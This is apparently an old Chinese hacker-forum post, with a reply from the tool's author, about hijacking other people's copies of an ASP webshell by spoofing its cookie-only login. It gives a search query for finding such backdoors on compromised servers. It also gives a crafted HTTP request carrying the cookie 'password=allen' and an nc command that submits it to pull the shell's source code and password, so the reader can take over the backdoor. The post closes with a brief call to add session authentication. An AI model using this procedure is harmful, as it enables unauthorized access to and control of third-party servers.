希望LCX别看到这篇文章，呵呵

最近海洋不知道怎么回事，不能上了，我就发在这里了。

我粗粗的看了一下代码，发现了一个问题，可以得到木马的密码，变成自己的木马。

思路是通过提交的COOKIE来查看木马的原代码，找出密码

看下面的代码

if trim(request.form("password"))="haiyangtop.126.com" then

response.cookies("password")="allen" 密码是否正确

response.redirect ""&url&""

else if Request.Cookies("password")<>"allen" then

call login() 密码错误

response.end 停止运行

注意：response.cookies("password")="allen"

他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。

还是实战一次：

1 找到一个后门，呵呵，不是我的，

在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字，你也可以换成别的，注意一定要加引号，表示不拆分字符串查询。

这样就找到了许多，呵呵，我选了一个，路径是http://ip/images/globla.asp

2 在自己的计算机得到完好的COOKIE信息

我自己的木马是http://ip/pic/xp.asp

用到一个工具winsock expert

登陆到自己的ASP木马，然后找到自己木马的路径，停！打开winsock expert选择监视对应的IE，然后回到IE点编辑，此时，IE显示出你的木马的原代码了，转到winsock expert 在前几行有一个用get 方法给你的木马的数据，我的是

GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1

Accept: */*

Referer: http://202.202.202.202/pic/xp.asp?path=/pic&oldpath=&attrib=

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

Host: 202.202.202.202

Connection: Keep-Alive

Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen

看到password=allen了么？这是ASP木马认证你是否登陆了方法。现在很简单了

把  数 据中所有的 ip 和路径改为别人的木马路径。还要将

GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1

中的PATH=后的值改为别人的木马路径。

我找的木马是http://ip/images/globla.asp

所以我改后的数据是

GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1

Accept: */*

Referer: http://202.202.202.202/images/globla.asp?path=/images&oldpath=&attrib=

Accept-Language: zh-cn

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

Host: 202.202.202.202

Connection: Keep-Alive

Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen

好了，保存在文本。

3 提交我们的数据

进入命令行，进入NC的目录,键入命令

nc -vv 202.202.202.202 80 >1.txt

>1.txt 表示将返回的信息保存在同目录的1.txt

一定要在CMD下键入命令，直接打开NC无法保存数据

呆会会提示连接成功，然后我门将作好的COOKIE粘贴在里面，然后按两次回车。

实际这时我门就通过了他的 验证并请求木马的原代码。

然后在同目录下1.txt就看到了木马的原代码，

修改下面的haiyangtop.126.com改为你密码

if trim(request.form("password"))="23kodf@" then

哈哈，看到密码了，然后登陆吧，再改了密码，这个木马就是你的了。

俗话说了，黑窝更应该加强安全警戒，海洋顶端木马应用的范围很广，希望作者能尽快改进，添加session认证，使其更安全！

lcx:写的海阳顶端网的总是写得非常好呀。这个漏洞我很早就知道了，但利用方法没想到你做得这么巧妙！！精彩。2003版漏洞更大，上传根本不需要密码。

其实，原来写的时候，只是将别人的一些代码组织在一块儿，根本没有考虑密码的问题，只是做为一个后门。用了个密码，只是区分fso和非fso。

还要说明一点的是，我和allen不会对这个木马再做任何改动了。

整天将别人的源码组合来组合去，还要回答无穷无尽的关于菜鸟对这个asp木马的使用方法，谁还改呀~